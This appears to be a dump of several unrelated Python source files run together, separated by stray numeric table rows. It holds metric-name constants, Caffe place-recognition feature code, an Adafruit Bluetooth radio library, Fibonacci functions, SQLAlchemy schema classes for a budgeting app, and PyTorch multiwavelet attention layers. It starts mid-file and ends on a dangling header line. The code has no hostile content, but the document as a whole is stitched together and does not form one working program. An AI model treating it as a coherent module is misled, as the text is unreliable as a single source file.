CromwellAdditionalTotalTimeSeconds = "cromwellAdditionalTotalTimeSeconds"
CromwellEnd = "cromwellEnd"
CromwellStart = "cromwellStart"
CromwellTotalTimeSeconds = "cromwellTotalTimeSeconds"
DelocalizationTimeSeconds = "delocalizationTimeSeconds"
Disks = "disks"
DockerImagePullTimeSeconds = "dockerImagePullTimeSeconds"
LocalizationTimeSeconds = "localizationTimeSeconds"
MachineType = "machineType"
OperationId = "operationId"
OtherTimeSeconds = "otherTimeSeconds"
# PAPI-side lifecycle timings.
PapiCreate = "papiCreate"
PapiEnd = "papiEnd"
PapiStart = "papiStart"
PapiTotalTimeSeconds = "papiTotalTimeSeconds"
ShardIndex = "shardIndex"
StartupTimeSeconds = "startupTimeSeconds"
UserCommandTimeSeconds = "userCommandTimeSeconds"
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 5 15:34:18 2020
@author: mubariz
"""
import caffe
import numpy as np
import os
def compute_map_features(ref_map):
    """Compute a HybridNet descriptor for every image in the reference map.

    For each image, conv5 activations are max-pooled over a 30-region spatial
    pyramid (whole map + 2x2 + 3x3 + 4x4 grids), producing a (256, 30)
    descriptor per image.

    Improvement: the 30 hand-unrolled ``np.max`` lines (duplicated in
    compute_query_desc) are replaced by a data-driven region table built in
    exactly the original order.

    :param ref_map: iterable of H x W x 3 images in the 0-255 range.
    :return: list of (256, 30) numpy arrays, one per reference image.
    """
    base = str(os.path.abspath(os.curdir)) + '/VPR_Techniques/HybridNet/'
    mean_npy = np.load(base + 'hybridnet_mean.npy')
    print('Mean Array Shape:' + str(mean_npy.shape))
    net = caffe.Net(base + 'deploy.prototxt', base + 'HybridNet.caffemodel', caffe.TEST)

    transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
    print(net.blobs['data'].data.shape)
    transformer.set_transpose('data', (2, 0, 1))     # move image channels to outermost dimension
    transformer.set_mean('data', mean_npy)           # subtract the dataset-mean value in each channel
    transformer.set_raw_scale('data', 255)           # rescale from [0, 1] to [0, 255]
    transformer.set_channel_swap('data', (2, 1, 0))  # swap channels from RGB to BGR

    # Spatial pyramid: whole map, then 2x2 / 3x3 / 4x4 grids in row-major
    # order — reproducing the 30 original regions in the original column order.
    # NOTE(review): some rows/cols are skipped between cells (e.g. index 6 in
    # the 2x2 grid), exactly as in the original code — confirm this is intended.
    pyramid = (
        ((0, 6), (7, 12)),
        ((0, 4), (5, 8), (9, 12)),
        ((0, 3), (4, 6), (7, 9), (10, 12)),
    )
    regions = [(slice(None), slice(None))]
    for bounds in pyramid:
        for row_start, row_stop in bounds:
            for col_start, col_stop in bounds:
                regions.append((slice(row_start, row_stop), slice(col_start, col_stop)))

    ref_features = []
    for image_reference in ref_map:
        image_reference = image_reference / 255.
        image_reference = image_reference[:, :, (2, 1, 0)]
        features_ref_local = np.zeros((256, 30))
        if image_reference is not None:  # kept from the original; None would already have failed above
            transformed_image_ref = transformer.preprocess('data', image_reference)
            net.blobs['data'].data[...] = transformed_image_ref.copy()
            net.forward()
            # NOTE(review): batch index 1 (not 0) is read here, matching the
            # original — confirm the deploy prototxt uses a batch size >= 2.
            features_ref = np.asarray(net.blobs['conv5'].data)[1, :, :, :].copy()
            for i in range(256):
                for j, (rows, cols) in enumerate(regions):
                    features_ref_local[i, j] = np.max(features_ref[i, rows, cols])
        ref_features.append(features_ref_local)
    print('Reference images descriptors computed!')
    return ref_features
def compute_query_desc(image_query):
    """Compute the (256, 30) HybridNet descriptor for a single query image.

    Same conv5 spatial-pyramid max-pooling as compute_map_features. The 30
    hand-unrolled ``np.max`` lines were replaced by a data-driven region
    table built in exactly the original order.

    :param image_query: H x W x 3 image array in the 0-255 range.
    :return: (256, 30) numpy array (all zeros when the image is None).
    """
    base = str(os.path.abspath(os.curdir)) + '/VPR_Techniques/HybridNet/'
    mean_npy = np.load(base + 'hybridnet_mean.npy')
    print('Mean Array Shape:' + str(mean_npy.shape))
    net = caffe.Net(base + 'deploy.prototxt', base + 'HybridNet.caffemodel', caffe.TEST)

    transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
    print(net.blobs['data'].data.shape)
    transformer.set_transpose('data', (2, 0, 1))     # move image channels to outermost dimension
    transformer.set_mean('data', mean_npy)           # subtract the dataset-mean value in each channel
    transformer.set_raw_scale('data', 255)           # rescale from [0, 1] to [0, 255]
    transformer.set_channel_swap('data', (2, 1, 0))  # swap channels from RGB to BGR

    # Spatial pyramid regions — identical table to compute_map_features.
    pyramid = (
        ((0, 6), (7, 12)),
        ((0, 4), (5, 8), (9, 12)),
        ((0, 3), (4, 6), (7, 9), (10, 12)),
    )
    regions = [(slice(None), slice(None))]
    for bounds in pyramid:
        for row_start, row_stop in bounds:
            for col_start, col_stop in bounds:
                regions.append((slice(row_start, row_stop), slice(col_start, col_stop)))

    features_query_local = np.zeros((256, 30))
    image_query = image_query / 255.
    image_query = image_query[:, :, (2, 1, 0)]
    if image_query is not None:  # kept from the original; None would already have failed above
        transformed_image_query = transformer.preprocess('data', image_query)
        net.blobs['data'].data[...] = transformed_image_query.copy()
        net.forward()
        # NOTE(review): batch index 1 (not 0) is read here, matching the
        # original — confirm the deploy prototxt uses a batch size >= 2.
        features_query = np.asarray(net.blobs['conv5'].data)[1, :, :, :].copy()
        for i in range(256):
            for j, (rows, cols) in enumerate(regions):
                features_query_local[i, j] = np.max(features_query[i, rows, cols])
    return features_query_local
def perform_VPR(features_query_local, ref_map_features):
    """Match a query descriptor against every reference descriptor.

    Similarity per reference: 1 - L1 distance normalised by 256*256.

    :param features_query_local: (256, 30) query descriptor.
    :param ref_map_features: sequence of (256, 30) reference descriptors.
    :return: (best score, index of best match, full score vector).
    """
    scores = [
        1 - (np.sum(abs(np.subtract(features_query_local, reference))) / (256 * 256))
        for reference in ref_map_features
    ]
    confusion_vector = np.array(scores)
    return np.amax(confusion_vector), np.argmax(confusion_vector), confusion_vector
| 8,765 | 3,393 |
# SPDX-FileCopyrightText: 2019 Nicholas H. Tollervey for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_ble_radio`
================================================================================
Simple byte and string based inter-device communication via BLE.
* Author(s): Nicholas H.Tollervey for Adafruit Industries
**Hardware:**
Adafruit Feather nRF52840 Express <https://www.adafruit.com/product/4062>
Adafruit Circuit Playground Bluefruit <https://www.adafruit.com/product/4333>
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
import time
import struct
from micropython import const
from adafruit_ble import BLERadio
from adafruit_ble.advertising import Advertisement, LazyObjectField
from adafruit_ble.advertising.standard import ManufacturerData
__version__ = "0.3.3"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_BLE_Radio.git"
#: Maximum length of a message (in bytes).
MAX_LENGTH = 248
#: Amount of time to advertise a message (in seconds).
AD_DURATION = 0.5
# BLE Advertising Data Type code for manufacturer-specific data.
_MANUFACTURING_DATA_ADT = const(0xFF)
# Bluetooth SIG company identifier assigned to Adafruit.
_ADAFRUIT_COMPANY_ID = const(0x0822)
# Key under which radio payloads are stored in the manufacturer data.
_RADIO_DATA_ID = const(0x0001)  # TODO: check this isn't already taken.
class _RadioAdvertisement(Advertisement):
    """Broadcast arbitrary bytes as a radio message."""
    # Match any manufacturer-data advertisement carrying Adafruit's company ID.
    match_prefixes = (struct.pack("<BH", 0xFF, _ADAFRUIT_COMPANY_ID),)
    manufacturer_data = LazyObjectField(
        ManufacturerData,
        "manufacturer_data",
        advertising_data_type=_MANUFACTURING_DATA_ADT,
        company_id=_ADAFRUIT_COMPANY_ID,
        key_encoding="<H",
    )
    @classmethod
    def matches(cls, entry):
        """Checks for ID matches"""
        # Too short to contain the 2-byte data ID at offset 5.
        if len(entry.advertisement_bytes) < 6:
            return False
        # Check the key position within the manufacturer data. We already know
        # prefix matches so we don't need to check it twice.
        return (
            struct.unpack_from("<H", entry.advertisement_bytes, 5)[0] == _RADIO_DATA_ID
        )
    @property
    def msg(self):
        """Raw radio data (empty bytes when no radio payload is present)."""
        if _RADIO_DATA_ID not in self.manufacturer_data.data:
            return b""
        return self.manufacturer_data.data[_RADIO_DATA_ID]
    @msg.setter
    def msg(self, value):
        # Store the payload under the radio data ID inside manufacturer data.
        self.manufacturer_data.data[_RADIO_DATA_ID] = value
class Radio:
    """
    Represents a connection through which one can send or receive strings
    and bytes. The radio can be tuned to a specific channel upon initialisation
    or via the `configure` method.
    """
    def __init__(self, **args):
        """
        Takes the same configuration arguments as the `configure` method.
        """
        # For BLE related operations.
        self.ble = BLERadio()
        # The uid for the outgoing message. Incremented modulo 255 on each
        # send, so it cycles through the values 0-254.
        self.uid = 0
        # Contains timestamped message metadata to mitigate report of
        # receiving of duplicate messages within AD_DURATION time frame.
        self.msg_pool = set()
        # Handle user related configuration.
        self.configure(**args)
    def configure(self, channel=42):
        """
        Set configuration values for the radio.
        :param int channel: The channel (0-255) the radio is listening /
        broadcasting on.
        :raises ValueError: If the channel is outside the range 0-255.
        """
        if -1 < channel < 256:
            self._channel = channel
        else:
            raise ValueError("Channel must be in range 0-255")
    def send(self, message):
        """
        Send a message string on the channel to which the radio is
        broadcasting.
        :param str message: The message string to broadcast.
        """
        # Encode to UTF-8 and defer to the byte-level send.
        return self.send_bytes(message.encode("utf-8"))
    def send_bytes(self, message):
        """
        Send bytes on the channel to which the radio is broadcasting.
        :param bytes message: The bytes to broadcast.
        :raises ValueError: If the message exceeds MAX_LENGTH bytes.
        """
        # Ensure length of message.
        if len(message) > MAX_LENGTH:
            raise ValueError("Message too long (max length = {})".format(MAX_LENGTH))
        advertisement = _RadioAdvertisement()
        # Concatenate the bytes that make up the advertised message:
        # one channel byte, one uid byte, then the payload itself.
        advertisement.msg = struct.pack("<BB", self._channel, self.uid) + message
        self.uid = (self.uid + 1) % 255
        # Advertise (block) for AD_DURATION period of time.
        self.ble.start_advertising(advertisement)
        time.sleep(AD_DURATION)
        self.ble.stop_advertising()
    def receive(self):
        """
        Returns a message received on the channel on which the radio is
        listening.
        :return: A string representation of the received message, or else None.
        """
        msg = self.receive_full()
        if msg:
            # Strip NUL padding that may accompany the payload.
            return msg[0].decode("utf-8").replace("\x00", "")
        return None
    def receive_full(self):
        """
        Returns a tuple containing three values representing a message received
        on the channel on which the radio is listening. If no message was
        received then `None` is returned.
        The three values in the tuple represent:
        * the bytes received.
        * the RSSI (signal strength: 0 = max, -255 = min).
        * a microsecond timestamp: the value returned by time.monotonic() when
        the message was received.
        :return: A tuple representation of the received message, or else None.
        """
        try:
            for entry in self.ble.start_scan(
                _RadioAdvertisement, minimum_rssi=-255, timeout=1, extended=True
            ):
                # Extract channel and unique message ID bytes.
                chan, uid = struct.unpack("<BB", entry.msg[:2])
                if chan == self._channel:
                    now = time.monotonic()
                    addr = entry.address.address_bytes
                    # Ensure this message isn't a duplicate. Message metadata
                    # is a tuple of (now, chan, uid, addr), to (mostly)
                    # uniquely identify a specific message in a certain time
                    # window.
                    expired_metadata = set()
                    duplicate = False
                    for msg_metadata in self.msg_pool:
                        if msg_metadata[0] < now - AD_DURATION:
                            # Ignore expired entries and mark for removal.
                            expired_metadata.add(msg_metadata)
                        elif (chan, uid, addr) == msg_metadata[1:]:
                            # Ignore matched messages to avoid duplication.
                            duplicate = True
                    # Remove expired entries.
                    self.msg_pool = self.msg_pool - expired_metadata
                    if not duplicate:
                        # Add new message's metadata to the msg_pool and
                        # return it as a result.
                        self.msg_pool.add((now, chan, uid, addr))
                        msg = entry.msg[2:]
                        return (msg, entry.rssi, now)
        finally:
            # Always stop scanning, even on early return or error.
            self.ble.stop_scan()
        return None
| 7,228 | 2,075 |
#!/usr/bin/python
'''FibonacciList(n)
create an array F[0... n]
F[0] <- 0
F[1] <- 1
for i from 2 to n:
F[i] <- F[i-1] + F[i-2]
return F[n]
'''
def fibonacci_recurs(n):
    """Return the n-th Fibonacci number via naive double recursion."""
    # Base case: F(0) = 0, F(1) = 1.
    return n if n <= 1 else fibonacci_recurs(n - 1) + fibonacci_recurs(n - 2)
def fibonacci_iter(n):
    """Return the n-th Fibonacci number iteratively.

    Improvements over the original: O(1) space (no full list is kept) and an
    explicit error for negative input — the list version silently returned a
    wrong value via negative indexing (e.g. fib[-3]).

    Args:
        n: Non-negative index into the Fibonacci sequence (F(0) = 0).

    Returns:
        int: The n-th Fibonacci number.

    Raises:
        ValueError: If n is negative.
    """
    if n < 0:
        raise ValueError("n must be non-negative")
    prev, curr = 0, 1
    for _ in range(n):
        prev, curr = curr, prev + curr
    return prev
if __name__ == "__main__":
    # Demo: F(10) == 55.
    print(fibonacci_iter(10))
| 536 | 250 |
from sqlalchemy import Boolean
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import ForeignKey
from sqlalchemy import String
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship
from pynYNAB.schema.Entity import Entity, Base
from pynYNAB.schema.types import ArrayType
class CatalogEntity(Entity):
    """Mixin for catalog-scoped entities: links each row to a parent Catalog."""
    @declared_attr
    def parent_id(self):
        # Foreign key back to the owning catalog row.
        return Column(ForeignKey('catalog.id'))
    @declared_attr
    def parent(self):
        # ORM relationship to the parent Catalog object.
        return relationship('Catalog')
class CatalogBudget(Base, CatalogEntity):
    """A budget as listed in the nYNAB catalog."""
    budget_name = Column(String)
    created_at = Column(DateTime)
class User(Base, CatalogEntity):
    """An nYNAB account holder."""
    username = Column(String)
    # Stored as a string rather than DateTime — presumably the raw API value.
    trial_expires_on = Column(String)
    email = Column(String)
    feature_flags = Column(ArrayType)
    is_subscribed = Column(Boolean)
class UserSetting(Base, CatalogEntity):
    """A single name/value setting belonging to a User."""
    setting_name = Column(String)
    user_id = Column(ForeignKey('user.id'))
    user = relationship('User', foreign_keys=user_id, backref='settings')
    setting_value = Column(String)
class UserBudget(Base, CatalogEntity):
    """Association between a User and a CatalogBudget, with permissions."""
    budget_id = Column(ForeignKey('catalogbudget.id'))
    budget = relationship('CatalogBudget')
    user_id = Column(ForeignKey('user.id'))
    user = relationship('User', foreign_keys=user_id, backref='budgets')
    permissions = Column(String)
class BudgetVersion(Base, CatalogEntity):
    """A concrete version of a CatalogBudget (formats, name, source)."""
    date_format = Column(String)
    # Stored as a string rather than DateTime — presumably the raw API value.
    last_accessed_on = Column(String)
    currency_format = Column(String)
    budget_id = Column(ForeignKey('catalogbudget.id'))
    budget = relationship('CatalogBudget', foreign_keys=budget_id)
    version_name = Column(String)
    source = Column(String)
| 1,715 | 516 |
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
from typing import List, Tuple
import math
from functools import partial
from einops import rearrange, reduce, repeat
from torch import nn, einsum, diagonal
from math import log2, ceil
import pdb
from utils.masking import LocalMask
from layers.utils import get_filter
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class MultiWaveletTransform(nn.Module):
    """
    1D multiwavelet block.
    Projects values into a (c, k) multiwavelet space, applies nCZ stacked
    MWT_CZ1d blocks (ReLU between them), and projects back to ich channels.
    """
    def __init__(self, ich=1, k=8, alpha=16, c=128,
                 nCZ=1, L=0, base='legendre', attention_dropout=0.1):
        super(MultiWaveletTransform, self).__init__()
        print('base', base)
        self.k = k
        self.c = c
        self.L = L
        self.nCZ = nCZ
        # Input projection ich -> c*k and output projection c*k -> ich.
        self.Lk0 = nn.Linear(ich, c * k)
        self.Lk1 = nn.Linear(c * k, ich)
        self.ich = ich
        self.MWT_CZ = nn.ModuleList(MWT_CZ1d(k, alpha, L, c, base) for i in range(nCZ))
    def forward(self, queries, keys, values, attn_mask):
        # queries: (B, L, H, E); values: (B, S, H, D). attn_mask is unused.
        B, L, H, E = queries.shape
        _, S, _, D = values.shape
        if L > S:
            # Zero-pad keys/values along time so their length matches queries.
            zeros = torch.zeros_like(queries[:, :(L - S), :]).float()
            values = torch.cat([values, zeros], dim=1)
            keys = torch.cat([keys, zeros], dim=1)
        else:
            # Truncate keys/values to the query length.
            values = values[:, :L, :, :]
            keys = keys[:, :L, :, :]
        values = values.view(B, L, -1)
        V = self.Lk0(values).view(B, L, self.c, -1)
        for i in range(self.nCZ):
            V = self.MWT_CZ[i](V)
            if i < self.nCZ - 1:
                # ReLU between stacked blocks, but not after the last one.
                V = F.relu(V)
        V = self.Lk1(V.view(B, L, -1))
        V = V.view(B, L, -1, D)
        # Second element is None for interface parity with attention layers.
        return (V.contiguous(), None)
class MultiWaveletCross(nn.Module):
    """
    1D Multiwavelet Cross Attention layer.
    Decomposes q/k/v with a multiwavelet cascade, applies Fourier
    cross-attention at each scale, then reconstructs the output.
    """
    def __init__(self, in_channels, out_channels, seq_len_q, seq_len_kv, modes, c=64,
                 k=8, ich=512,
                 L=0,
                 base='legendre',
                 mode_select_method='random',
                 initializer=None, activation='tanh',
                 **kwargs):
        super(MultiWaveletCross, self).__init__()
        print('base', base)
        self.c = c
        self.k = k
        self.L = L
        # Multiwavelet filter banks (H: scaling, G: wavelet) for the base.
        H0, H1, G0, G1, PHI0, PHI1 = get_filter(base, k)
        H0r = H0 @ PHI0
        G0r = G0 @ PHI0
        H1r = H1 @ PHI1
        G1r = G1 @ PHI1
        # Zero-out numerically negligible filter entries.
        H0r[np.abs(H0r) < 1e-8] = 0
        H1r[np.abs(H1r) < 1e-8] = 0
        G0r[np.abs(G0r) < 1e-8] = 0
        G1r[np.abs(G1r) < 1e-8] = 0
        self.max_item = 3
        # attn1/attn2 act on the per-scale detail/smooth pairs, attn3 on the
        # smooth coefficients, attn4 on the coarsest-scale remainder.
        self.attn1 = FourierCrossAttentionW(in_channels=in_channels, out_channels=out_channels, seq_len_q=seq_len_q,
                                            seq_len_kv=seq_len_kv, modes=modes, activation=activation,
                                            mode_select_method=mode_select_method)
        self.attn2 = FourierCrossAttentionW(in_channels=in_channels, out_channels=out_channels, seq_len_q=seq_len_q,
                                            seq_len_kv=seq_len_kv, modes=modes, activation=activation,
                                            mode_select_method=mode_select_method)
        self.attn3 = FourierCrossAttentionW(in_channels=in_channels, out_channels=out_channels, seq_len_q=seq_len_q,
                                            seq_len_kv=seq_len_kv, modes=modes, activation=activation,
                                            mode_select_method=mode_select_method)
        self.attn4 = FourierCrossAttentionW(in_channels=in_channels, out_channels=out_channels, seq_len_q=seq_len_q,
                                            seq_len_kv=seq_len_kv, modes=modes, activation=activation,
                                            mode_select_method=mode_select_method)
        self.T0 = nn.Linear(k, k)
        # Decomposition (ec_*) and reconstruction (rc_*) filter buffers.
        self.register_buffer('ec_s', torch.Tensor(
            np.concatenate((H0.T, H1.T), axis=0)))
        self.register_buffer('ec_d', torch.Tensor(
            np.concatenate((G0.T, G1.T), axis=0)))
        self.register_buffer('rc_e', torch.Tensor(
            np.concatenate((H0r, G0r), axis=0)))
        self.register_buffer('rc_o', torch.Tensor(
            np.concatenate((H1r, G1r), axis=0)))
        # Projections of flattened heads (ich) into the (c, k) wavelet space.
        self.Lk = nn.Linear(ich, c * k)
        self.Lq = nn.Linear(ich, c * k)
        self.Lv = nn.Linear(ich, c * k)
        self.out = nn.Linear(c * k, ich)
        self.modes1 = modes
    def forward(self, q, k, v, mask=None):
        B, N, H, E = q.shape  # (B, N, H, E) torch.Size([3, 768, 8, 2])
        _, S, _, _ = k.shape  # (B, S, H, E) torch.Size([3, 96, 8, 2])
        # Flatten heads, then project q/k/v into the (c, k) wavelet space.
        q = q.view(q.shape[0], q.shape[1], -1)
        k = k.view(k.shape[0], k.shape[1], -1)
        v = v.view(v.shape[0], v.shape[1], -1)
        q = self.Lq(q)
        q = q.view(q.shape[0], q.shape[1], self.c, self.k)
        k = self.Lk(k)
        k = k.view(k.shape[0], k.shape[1], self.c, self.k)
        v = self.Lv(v)
        v = v.view(v.shape[0], v.shape[1], self.c, self.k)
        # Length-align k/v with q: zero-pad when shorter, truncate when longer.
        if N > S:
            zeros = torch.zeros_like(q[:, :(N - S), :]).float()
            v = torch.cat([v, zeros], dim=1)
            k = torch.cat([k, zeros], dim=1)
        else:
            v = v[:, :N, :, :]
            k = k[:, :N, :, :]
        # Pad sequence length up to the next power of two for the cascade.
        ns = math.floor(np.log2(N))
        nl = pow(2, math.ceil(np.log2(N)))
        extra_q = q[:, 0:nl - N, :, :]
        extra_k = k[:, 0:nl - N, :, :]
        extra_v = v[:, 0:nl - N, :, :]
        q = torch.cat([q, extra_q], 1)
        k = torch.cat([k, extra_k], 1)
        v = torch.cat([v, extra_v], 1)
        Ud_q = torch.jit.annotate(List[Tuple[Tensor]], [])
        Ud_k = torch.jit.annotate(List[Tuple[Tensor]], [])
        Ud_v = torch.jit.annotate(List[Tuple[Tensor]], [])
        Us_q = torch.jit.annotate(List[Tensor], [])
        Us_k = torch.jit.annotate(List[Tensor], [])
        Us_v = torch.jit.annotate(List[Tensor], [])
        Ud = torch.jit.annotate(List[Tensor], [])
        Us = torch.jit.annotate(List[Tensor], [])
        # decompose: collect (detail, smooth) pairs for q, k and v per scale
        for i in range(ns - self.L):
            # print('q shape',q.shape)
            d, q = self.wavelet_transform(q)
            Ud_q += [tuple([d, q])]
            Us_q += [d]
        for i in range(ns - self.L):
            d, k = self.wavelet_transform(k)
            Ud_k += [tuple([d, k])]
            Us_k += [d]
        for i in range(ns - self.L):
            d, v = self.wavelet_transform(v)
            Ud_v += [tuple([d, v])]
            Us_v += [d]
        # Cross-attention per scale on detail and smooth coefficients.
        for i in range(ns - self.L):
            dk, sk = Ud_k[i], Us_k[i]
            dq, sq = Ud_q[i], Us_q[i]
            dv, sv = Ud_v[i], Us_v[i]
            Ud += [self.attn1(dq[0], dk[0], dv[0], mask)[0] + self.attn2(dq[1], dk[1], dv[1], mask)[0]]
            Us += [self.attn3(sq, sk, sv, mask)[0]]
        v = self.attn4(q, k, v, mask)[0]
        # reconstruct: inverse cascade from coarsest back to finest scale
        for i in range(ns - 1 - self.L, -1, -1):
            v = v + Us[i]
            v = torch.cat((v, Ud[i]), -1)
            v = self.evenOdd(v)
        # Drop the power-of-two padding and project back to ich channels.
        v = self.out(v[:, :N, :, :].contiguous().view(B, N, -1))
        return (v.contiguous(), None)
    def wavelet_transform(self, x):
        # Stack even/odd time samples, then filter into detail (d) and
        # smooth (s) coefficients; each output has half the time length.
        xa = torch.cat([x[:, ::2, :, :],
                        x[:, 1::2, :, :],
                        ], -1)
        d = torch.matmul(xa, self.ec_d)
        s = torch.matmul(xa, self.ec_s)
        return d, s
    def evenOdd(self, x):
        # Inverse of wavelet_transform: interleave reconstructed even/odd
        # samples, doubling the time length.
        B, N, c, ich = x.shape  # (B, N, c, k)
        assert ich == 2 * self.k
        x_e = torch.matmul(x, self.rc_e)
        x_o = torch.matmul(x, self.rc_o)
        x = torch.zeros(B, N * 2, c, self.k,
                        device=x.device)
        x[..., ::2, :, :] = x_e
        x[..., 1::2, :, :] = x_o
        return x
class FourierCrossAttentionW(nn.Module):
    """Cross attention computed on a subset of low-frequency Fourier modes."""
    def __init__(self, in_channels, out_channels, seq_len_q, seq_len_kv, modes=16, activation='tanh',
                 mode_select_method='random'):
        super(FourierCrossAttentionW, self).__init__()
        print('corss fourier correlation used!')
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.modes1 = modes
        self.activation = activation
    def forward(self, q, k, v, mask):
        # NOTE(review): `mask` is unused, and `v` only contributes its shape —
        # the value path below re-uses the key spectrum (xk_ft_). Confirm intent.
        B, L, E, H = q.shape
        xq = q.permute(0, 3, 2, 1)  # size = [B, H, E, L] torch.Size([3, 8, 64, 512])
        xk = k.permute(0, 3, 2, 1)
        xv = v.permute(0, 3, 2, 1)
        # Indices of the retained low-frequency modes (assigned on self as a
        # forward-pass side effect).
        self.index_q = list(range(0, min(int(L // 2), self.modes1)))
        self.index_k_v = list(range(0, min(int(xv.shape[3] // 2), self.modes1)))
        # Compute Fourier coefficients and gather the retained modes.
        xq_ft_ = torch.zeros(B, H, E, len(self.index_q), device=xq.device, dtype=torch.cfloat)
        xq_ft = torch.fft.rfft(xq, dim=-1)
        for i, j in enumerate(self.index_q):
            xq_ft_[:, :, :, i] = xq_ft[:, :, :, j]
        xk_ft_ = torch.zeros(B, H, E, len(self.index_k_v), device=xq.device, dtype=torch.cfloat)
        xk_ft = torch.fft.rfft(xk, dim=-1)
        for i, j in enumerate(self.index_k_v):
            xk_ft_[:, :, :, i] = xk_ft[:, :, :, j]
        # Attention weights in the frequency domain.
        xqk_ft = (torch.einsum("bhex,bhey->bhxy", xq_ft_, xk_ft_))
        if self.activation == 'tanh':
            xqk_ft = xqk_ft.tanh()
        elif self.activation == 'softmax':
            xqk_ft = torch.softmax(abs(xqk_ft), dim=-1)
            xqk_ft = torch.complex(xqk_ft, torch.zeros_like(xqk_ft))
        else:
            raise Exception('{} actiation function is not implemented'.format(self.activation))
        xqkv_ft = torch.einsum("bhxy,bhey->bhex", xqk_ft, xk_ft_)
        xqkvw = xqkv_ft
        # Scatter the attended modes back into a full-length spectrum.
        out_ft = torch.zeros(B, H, E, L // 2 + 1, device=xq.device, dtype=torch.cfloat)
        for i, j in enumerate(self.index_q):
            out_ft[:, :, :, j] = xqkvw[:, :, :, i]
        out = torch.fft.irfft(out_ft / self.in_channels / self.out_channels, n=xq.size(-1)).permute(0, 3, 2, 1)
        # size = [B, L, H, E]
        return (out, None)
class sparseKernelFT1d(nn.Module):
    """Spectral convolution: channel mixing on the lowest `alpha` Fourier modes."""
    def __init__(self,
                 k, alpha, c=1,
                 nl=1,
                 initializer=None,
                 **kwargs):
        super(sparseKernelFT1d, self).__init__()
        # Number of retained (lowest-frequency) Fourier modes.
        self.modes1 = alpha
        self.scale = (1 / (c * k * c * k))
        # Complex mixing weights per retained mode: (c*k, c*k, modes1).
        self.weights1 = nn.Parameter(self.scale * torch.rand(c * k, c * k, self.modes1, dtype=torch.cfloat))
        self.weights1.requires_grad = True
        self.k = k
    def compl_mul1d(self, x, weights):
        # (batch, in_channel, x ), (in_channel, out_channel, x) -> (batch, out_channel, x)
        return torch.einsum("bix,iox->box", x, weights)
    def forward(self, x):
        B, N, c, k = x.shape  # (B, N, c, k)
        # Fold (c, k) into a single channel axis ahead of the length axis.
        x = x.view(B, N, -1)
        x = x.permute(0, 2, 1)
        x_fft = torch.fft.rfft(x)
        # Multiply relevant Fourier modes
        l = min(self.modes1, N // 2 + 1)
        # l = N//2+1
        out_ft = torch.zeros(B, c * k, N // 2 + 1, device=x.device, dtype=torch.cfloat)
        out_ft[:, :, :l] = self.compl_mul1d(x_fft[:, :, :l], self.weights1[:, :, :l])
        # Back to the time domain and the original (B, N, c, k) layout.
        x = torch.fft.irfft(out_ft, n=N)
        x = x.permute(0, 2, 1).view(B, N, c, k)
        return x
# ##
class MWT_CZ1d(nn.Module):
    """Single multiwavelet transform block: wavelet decomposition, sparse
    spectral kernels (A, B, C) per scale, then inverse reconstruction."""
    def __init__(self,
                 k=3, alpha=64,
                 L=0, c=1,
                 base='legendre',
                 initializer=None,
                 **kwargs):
        super(MWT_CZ1d, self).__init__()
        self.k = k
        self.L = L
        # Multiwavelet filter banks (H: scaling, G: wavelet) for the base.
        H0, H1, G0, G1, PHI0, PHI1 = get_filter(base, k)
        H0r = H0 @ PHI0
        G0r = G0 @ PHI0
        H1r = H1 @ PHI1
        G1r = G1 @ PHI1
        # Zero-out numerically negligible filter entries.
        H0r[np.abs(H0r) < 1e-8] = 0
        H1r[np.abs(H1r) < 1e-8] = 0
        G0r[np.abs(G0r) < 1e-8] = 0
        G1r[np.abs(G1r) < 1e-8] = 0
        self.max_item = 3
        # Per-scale spectral kernels: A/B act on detail+smooth, C on detail.
        self.A = sparseKernelFT1d(k, alpha, c)
        self.B = sparseKernelFT1d(k, alpha, c)
        self.C = sparseKernelFT1d(k, alpha, c)
        self.T0 = nn.Linear(k, k)
        # Decomposition (ec_*) and reconstruction (rc_*) filter buffers.
        self.register_buffer('ec_s', torch.Tensor(
            np.concatenate((H0.T, H1.T), axis=0)))
        self.register_buffer('ec_d', torch.Tensor(
            np.concatenate((G0.T, G1.T), axis=0)))
        self.register_buffer('rc_e', torch.Tensor(
            np.concatenate((H0r, G0r), axis=0)))
        self.register_buffer('rc_o', torch.Tensor(
            np.concatenate((H1r, G1r), axis=0)))
    def forward(self, x):
        B, N, c, k = x.shape  # (B, N, k)
        # Pad sequence length up to the next power of two for the cascade.
        ns = math.floor(np.log2(N))
        nl = pow(2, math.ceil(np.log2(N)))
        extra_x = x[:, 0:nl - N, :, :]
        x = torch.cat([x, extra_x], 1)
        Ud = torch.jit.annotate(List[Tensor], [])
        Us = torch.jit.annotate(List[Tensor], [])
        # decompose
        for i in range(ns - self.L):
            # print('x shape',x.shape)
            d, x = self.wavelet_transform(x)
            Ud += [self.A(d) + self.B(x)]
            Us += [self.C(d)]
        x = self.T0(x)  # coarsest scale transform
        # reconstruct
        for i in range(ns - 1 - self.L, -1, -1):
            x = x + Us[i]
            x = torch.cat((x, Ud[i]), -1)
            x = self.evenOdd(x)
        # Drop the power-of-two padding.
        x = x[:, :N, :, :]
        return x
    def wavelet_transform(self, x):
        # Stack even/odd time samples, then filter into detail (d) and
        # smooth (s) coefficients; each output has half the time length.
        xa = torch.cat([x[:, ::2, :, :],
                        x[:, 1::2, :, :],
                        ], -1)
        d = torch.matmul(xa, self.ec_d)
        s = torch.matmul(xa, self.ec_s)
        return d, s
    def evenOdd(self, x):
        # Inverse of wavelet_transform: interleave reconstructed even/odd
        # samples, doubling the time length.
        B, N, c, ich = x.shape  # (B, N, c, k)
        assert ich == 2 * self.k
        x_e = torch.matmul(x, self.rc_e)
        x_o = torch.matmul(x, self.rc_o)
        x = torch.zeros(B, N * 2, c, self.k,
                        device=x.device)
        x[..., ::2, :, :] = x_e
        x[..., 1::2, :, :] = x_o
        return x
# encoding=utf-8
import os
